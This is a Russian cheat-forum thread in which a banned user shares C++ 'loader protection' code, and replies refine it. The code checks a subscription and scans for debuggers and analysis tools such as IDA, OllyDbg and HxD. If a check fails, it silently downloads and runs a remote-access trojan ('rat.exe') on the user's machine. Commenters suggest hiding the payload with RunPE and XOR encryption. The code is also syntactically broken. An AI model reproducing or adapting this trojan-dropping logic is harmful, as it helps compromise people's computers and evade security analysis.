• Я зарабатываю 100 000 RUB / месяц на этом сайте!

    А знаешь как? Я всего-лишь публикую (создаю темы), а админ мне платит. Трачу деньги на мороженое, робуксы и сервера в Minecraft. А ещё на паль из Китая. 

    Хочешь так же? Пиши и узнавай условия: https://t.me/alex_redact
    Реклама: https://t.me/yougame_official

Гайд Научите меня делать защиту для лоадера(буду благодарен)

Забаненный
Забаненный
Статус
Оффлайн
Регистрация
4 Ноя 2018
Сообщения
53
Реакции
7
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Приветствую , недавно создал тему со скрином "лучшей защиты лоадера", кому нужно юзайте, но говорю защиту не сложно обойти, но её можно доработать .
-могут быть проблемы на этом форуме, если вы будете чит рекламировать здесь.
-защиту можно обойти.
-могут быть большие проблемы с репутацией вашего проекта.


+систему можно довести до ума
+если ваш софт будут крякать , время от времени некоторые мамины крякеры будут оставаться без винды, жёстко, но приятно порой читать что они пишут в личку после этого.

Код:
Expand Collapse Copy
BOOL IsAdministrator(VOID) // проверка на то, запустил ли пользователь лоадер от имени администратора
{
    SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;
    PSID AdministratorsGroup;

    if (!AllocateAndInitializeSid(&NtAuthority, 2, SECURITY_BUILTIN_DOMAIN_RID,
        DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0, &AdministratorsGroup))
    {
        return FALSE;
    }

    BOOL IsInAdminGroup = FALSE;

    if (!CheckTokenMembership(NULL, AdministratorsGroup, &IsInAdminGroup))
    {
        IsInAdminGroup = FALSE;
    }

    FreeSid(AdministratorsGroup);
    return IsInAdminGroup;
}

bool doesHwidmatch() {
    //создание канала для подключение и проверка на успешность создания канала, если успешно - true, если не успешно - false
    //сюда я код не вставлял ибо смысла не вижу
}

char datareceived[4096]; // чтения файлов сервера о наличии подписки на софт и проверка на попытку кряка
DWORD NumberOfByteRead = 0;
while (InternetReadFile(OpenAdress, datareceived, 4096 & NumberOfBytesRead) && NumberOfBytesRead) {
    InternetCloseHandle(OpenAdress);
    InternetCloseHandle(connect);
    if (Datareceived, "GUORQYFADS") { // в скобка вводим любой пароль, сообщаем продавцу что бы после создания файла с информацией о подписке юезра в сам файл вставлял этот код.
        return true;
    }
    else
    {
        URLDowloadToFile(NULL, "ссылка на сайт", "назв файла, к примеру rat.exe", 0, 0);
        WinExec(/*C:\\rat.exe*/"rat.exe", SW_HIDE);
        exit(1);
    }
    return false;
}


Время от времени будут попадаться челы на это ,если доработать систему то ещё чаще. Рекомендую в свои пасты добавлять эту защиту.

Код:
Expand Collapse Copy
bool IsProcessRun(const char * const processName)
{
    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

    PROCESSENTRY32 pe;
    pe.dwSize = sizeof(PROCESSENTRY32);
    Process32First(hSnapshot, &pe);

    while (1) {
        if (strcmp(pe.szExeFile, processName) == 0) return true;
        if (!Process32Next(hSnapshot, &pe)) return false;
    }
}

void AntiDump()
    {
        if (IsProcessRun("idaq64.exe"))
        {
           URLDowloadToFile(NULL, "ссылка на сайт", "назв файла, к примеру rat.exe", 0, 0);
        WinExec(/*C:\\rat.exe*/"rat.exe", SW_HIDE);
        exit(1);
        }

        if (IsProcessRun("HxD.exe"))
        {
          URLDowloadToFile(NULL, "ссылка на сайт", "назв файла, к примеру rat.exe", 0, 0);
        WinExec(/*C:\\rat.exe*/"rat.exe", SW_HIDE);
        exit(1);

        if (IsProcessRun("ResourceHacker.exe"))
        {
          URLDowloadToFile(NULL, "ссылка на сайт", "назв файла, к примеру rat.exe", 0, 0);
        WinExec(/*C:\\rat.exe*/"rat.exe", SW_HIDE);
        exit(1);

        if (IsProcessRun("idaq32.exe"))
        {
          URLDowloadToFile(NULL, "ссылка на сайт", "назв файла, к примеру rat.exe", 0, 0);
        WinExec(/*C:\\rat.exe*/"rat.exe", SW_HIDE);
        exit(1);
        }

        if (IsProcessRun("ollydbg.exe"))
        {
            URLDowloadToFile(NULL, "ссылка на сайт", "назв файла, к примеру rat.exe", 0, 0);
        WinExec(/*C:\\rat.exe*/"rat.exe", SW_HIDE);
        exit(1);
        }

        if (IsProcessRun("httpdebugger.exe"))
        {
           URLDowloadToFile(NULL, "ссылка на сайт", "назв файла, к примеру rat.exe", 0, 0);
        WinExec(/*C:\\rat.exe*/"rat.exe", SW_HIDE);
        exit(1);

        if (IsProcessRun("windowrenamer.exe"))
        {
            URLDowloadToFile(NULL, "ссылка на сайт", "назв файла, к примеру rat.exe", 0, 0);
        WinExec(/*C:\\rat.exe*/"rat.exe", SW_HIDE);
        exit(1);
        }
    }
 
void AntiDump() { if (IsProcessRun("idaq64.exe")) { URLDowloadToFile(NULL, "ссылка на сайт", "назв файла, к примеру rat.exe", 0, 0); WinExec(/*C:\\rat.exe*/"rat.exe", SW_HIDE); exit(1); } if (IsProcessRun("HxD.exe")) { URLDowloadToFile(NULL, "ссылка на сайт", "назв файла, к примеру rat.exe", 0, 0); WinExec(/*C:\\rat.exe*/"rat.exe", SW_HIDE); exit(1); if (IsProcessRun("ResourceHacker.exe")) { URLDowloadToFile(NULL, "ссылка на сайт", "назв файла, к примеру rat.exe", 0, 0); WinExec(/*C:\\rat.exe*/"rat.exe", SW_HIDE); exit(1); if (IsProcessRun("idaq32.exe")) { URLDowloadToFile(NULL, "ссылка на сайт", "назв файла, к примеру rat.exe", 0, 0); WinExec(/*C:\\rat.exe*/"rat.exe", SW_HIDE); exit(1); } if (IsProcessRun("ollydbg.exe")) { URLDowloadToFile(NULL, "ссылка на сайт", "назв файла, к примеру rat.exe", 0, 0); WinExec(/*C:\\rat.exe*/"rat.exe", SW_HIDE); exit(1); } if (IsProcessRun("httpdebugger.exe")) { URLDowloadToFile(NULL, "ссылка на сайт", "назв файла, к примеру rat.exe", 0, 0); WinExec(/*C:\\rat.exe*/"rat.exe", SW_HIDE); exit(1); if (IsProcessRun("windowrenamer.exe")) { URLDowloadToFile(NULL, "ссылка на сайт", "назв файла, к примеру rat.exe", 0, 0); WinExec(/*C:\\rat.exe*/"rat.exe", SW_HIDE); exit(1); } }
будь проще

Код:
Expand Collapse Copy
void ByeByeCracker() {
  URLDowloadToFile(NULL, "ссылка на сайт", "назв файла, к примеру rat.exe", 0, 0);
  WinExec(/*C:\\rat.exe*/"rat.exe", SW_HIDE);
  exit(1);
}

void AntiDump()
{
  if (IsProcessRun("idaq64.exe")|| IsProcessRun("idaq32.exe") || IsProcessRun("HxD.exe") || IsProcessRun("ResourceHacker.exe")
  || IsProcessRun("ollydbg.exe")|| IsProcessRun("httpdebugger.exe") || IsProcessRun("windowrenamer.exe"))
  {
    ByeByeCracker();
  }
}
или вообще запихнуть этот код в цикл с итерацией процессов
 
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
будь проще

Код:
Expand Collapse Copy
void ByeByeCracker() {
  URLDowloadToFile(NULL, "ссылка на сайт", "назв файла, к примеру rat.exe", 0, 0);
  WinExec(/*C:\\rat.exe*/"rat.exe", SW_HIDE);
  exit(1);
}

void AntiDump()
{
  if (IsProcessRun("idaq64.exe")|| IsProcessRun("idaq32.exe") || IsProcessRun("HxD.exe") || IsProcessRun("ResourceHacker.exe")
  || IsProcessRun("ollydbg.exe")|| IsProcessRun("httpdebugger.exe") || IsProcessRun("windowrenamer.exe"))
  {
    ByeByeCracker();
  }
}
или вообще запихнуть этот код в цикл с итерацией процессов
не подумал)
 
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
будь проще

Код:
Expand Collapse Copy
void ByeByeCracker() {
  URLDowloadToFile(NULL, "ссылка на сайт", "назв файла, к примеру rat.exe", 0, 0);
  WinExec(/*C:\\rat.exe*/"rat.exe", SW_HIDE);
  exit(1);
}

void AntiDump()
{
  if (IsProcessRun("idaq64.exe")|| IsProcessRun("idaq32.exe") || IsProcessRun("HxD.exe") || IsProcessRun("ResourceHacker.exe")
  || IsProcessRun("ollydbg.exe")|| IsProcessRun("httpdebugger.exe") || IsProcessRun("windowrenamer.exe"))
  {
    ByeByeCracker();
  }
}
или вообще запихнуть этот код в цикл с итерацией процессов
я код просто спиздел второй с форума, не стал ничего менять
 
Нихуя ты приколист... А если я экзешку переименую? (ex. HtTttttPDebuggerr.exe) Тогда чо?
FindWindow для ЛАХОФФФ?
 
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Нихуя ты приколист... А если я экзешку переименую? (ex. HtTttttPDebuggerr.exe) Тогда чо?
FindWindow для ЛАХОФФФ?
Ну тебе придётся заранее менять экзешку.
Не думаю что ты заранее меняешь название exe файла) Поверь, челы будут попадаться на это не редко)
 
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
хули ты палишь контору,он же думал,что это топ защита
А как ты догадаешься заранее что здесь есть ратник и проверка (до открытие программы, про проверку ты узнаешь только тогда, когда уже винды не будет) По твоей логике, ты качаешь лоадер, и тебе продавец кидает от него исходник, что бы ты посмотрел код а потом юзал лоадер, так ты думаешь?)
{DELETED} одним словом, лучше бы ничего не {DELETED}. На эту {DELETED} попадается много челов, ну я уверен что ты тоже попался бы, ибо {DELETED}
 
Последнее редактирование модератором:
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
хули ты палишь контору,он же думал,что это топ защита
когда качаешь exe файл, ты не можешь смотреть код этого exe файла, только если скачаешь исходник (открываю тайну клоуну).
 
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
А как ты догадаешься заранее что здесь есть ратник и проверка (до открытие программы, про проверку ты узнаешь только тогда, когда уже винды не будет) По твоей логике, ты качаешь лоадер, и тебе продавец кидает от него исходник, что бы ты посмотрел код а потом юзал лоадер, так ты думаешь?)
Клоун одним словом, лучше бы ничего не высирал. На эту хуйню попадается много челов, ну я уверен что ты тоже попался бы, ибо тупой очень.
во-первых, любой нормальный человек юзает виртуальную машину, во-вторых, любой нормальный человек сначала чекает исходящие запросы без подключения к интернету. хватит щитпостить пж
 
BOOL IsAdministrator(VOID) // проверка на то, запустил ли пользователь лоадер от имени администратора
Бесполезно (ИМХО), есть для этого дела манифесты.
URLDowloadToFile(NULL, "ссылка на сайт", "назв файла, к примеру rat.exe", 0, 0); WinExec(/*C:\\rat.exe*/"rat.exe", SW_HIDE); exit(1);
Я бы лучше сделал что-то на подобии RunPE с заксореным бинарником файла "rat.exe" чтобы не вызывать лишних подозрений.
Про остальные проверки и их реализацию лучше промолчу xd
 
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Почему вы все ограничиваетесь паблик защитой из слитых спекрт/индиго лоадеров??? гитхаб и стак не для вас придумали?
 
Почему вы все ограничиваетесь паблик защитой из слитых спекрт/индиго лоадеров??? гитхаб и стак не для вас придумали?
Я смотрю в каждому софте проверяют на драйвера :roflanzdarova:
 
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Я смотрю в каждому софте проверяют на драйвера :roflanzdarova:
Эта хуета из бапа уже полтора года присутствует в моей защите лоадера кеек(я взломал этого дауна по этому тут сидит ахуенный чел)
 
Назад
Сверху Снизу